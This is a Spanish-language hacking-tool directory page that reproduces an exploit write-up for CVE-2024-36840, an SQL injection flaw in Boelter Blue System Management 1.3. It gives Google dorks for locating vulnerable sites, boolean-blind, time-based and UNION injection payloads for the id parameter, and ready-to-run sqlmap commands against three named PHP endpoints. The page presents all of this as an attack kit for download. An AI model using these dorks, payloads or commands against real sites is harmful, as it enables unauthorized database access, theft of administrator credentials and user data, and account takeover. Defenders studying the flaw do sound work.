Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-36840-Exploit — Exploit Para: CVE-2024-36840: Vulnerabilidad de Inyección SQL en Boelter Blue System Management (Versión 1.3) | Kitploit
Herramientas/GitHubGitHub/theexploiters/cve-2024-36840-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubtheexploiters/cve-2024-36840-exploit

CVE-2024-36840-Exploit

Exploit Para: CVE-2024-36840: Vulnerabilidad de Inyección SQL en Boelter Blue System Management (Versión 1.3)

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-36840: Vulnerabilidad de Inyección SQL en Boelter Blue System Management (Versión 1.3)

Detalles del Exploit

  • Título del Exploit: Vulnerabilidad de Inyección SQL en Boelter Blue System Management (versión 1.3)

  • Google Dork Original: inurl:"Powered by Boelter Blue" (no funcionó (cero resultados en la búsqueda))

  • Google Dork de Theexploiters: intext:"Powered by Boelter Blue" (funciona)

  • Fecha: 2024-06-04

  • Autor del Exploit: CBKB (DeadlyData, R4d1x)

  • Página del Proveedor: Boelter Blue

  • Enlace del Software: Google Play Store

  • Versión: 1.3

  • Probado en: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12

  • CVE: CVE-2024-36840

Descripción de la Vulnerabilidad

Se han identificado múltiples vulnerabilidades de Inyección SQL en Boelter Blue System Management (versión 1.3). Estas vulnerabilidades permiten a los atacantes inyectar y ejecutar comandos SQL arbitrarios a través de varios parámetros. La explotación exitosa puede resultar en acceso no autorizado, exfiltración de datos y posibles tomas de control de cuentas.

Parámetros Afectados y Detalles del Exploit:

  1. Parámetro: id (GET)

    • Tipo: Ciego basado en booleano
    • Payload: id=10071 AND 4036=4036
  2. Tipo: Ciego basado en tiempo

    • Payload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)
  3. Tipo: Consulta UNION

    • Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...

Endpoints Vulnerables

  1. news_details.php?id

    • Ejemplo: https://www.example.com/news_details.php?id=10071
    • Explotación:
      root@kitploit:~
      sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
      
  2. services.php?section

    • Ejemplo: https://www.example.com/services.php?section=5081
    • Explotación:
      root@kitploit:~
      sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
      
  3. location_details.php?id

    • Ejemplo: https://www.example.com/location_details.php?id=836
    • Explotación:
      root@kitploit:~
      sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs
      

Impacto

  • Acceso No Autorizado a la Base de Datos: La explotación puede conducir a un acceso no autorizado a la base de datos, permitiendo a los atacantes extraer información sensible.
  • Fuga de Datos: Datos sensibles como credenciales de administrador, PII de usuarios e historial de compras pueden verse comprometidos.
  • Toma de Control de Cuentas: Los atacantes pueden potencialmente tomar el control de cuentas de usuarios.
  • Control Total: Se puede lograr el control total sobre la aplicación afectada, lo que conlleva graves implicaciones de seguridad.

Créditos

  • Descubridores: CBKB (DeadlyData, R4d1x)

Referencias

  • Informe de Vulnerabilidad de CyberDepot
  • CVE-2024-36840

Repo View Counter

Descargar herramienta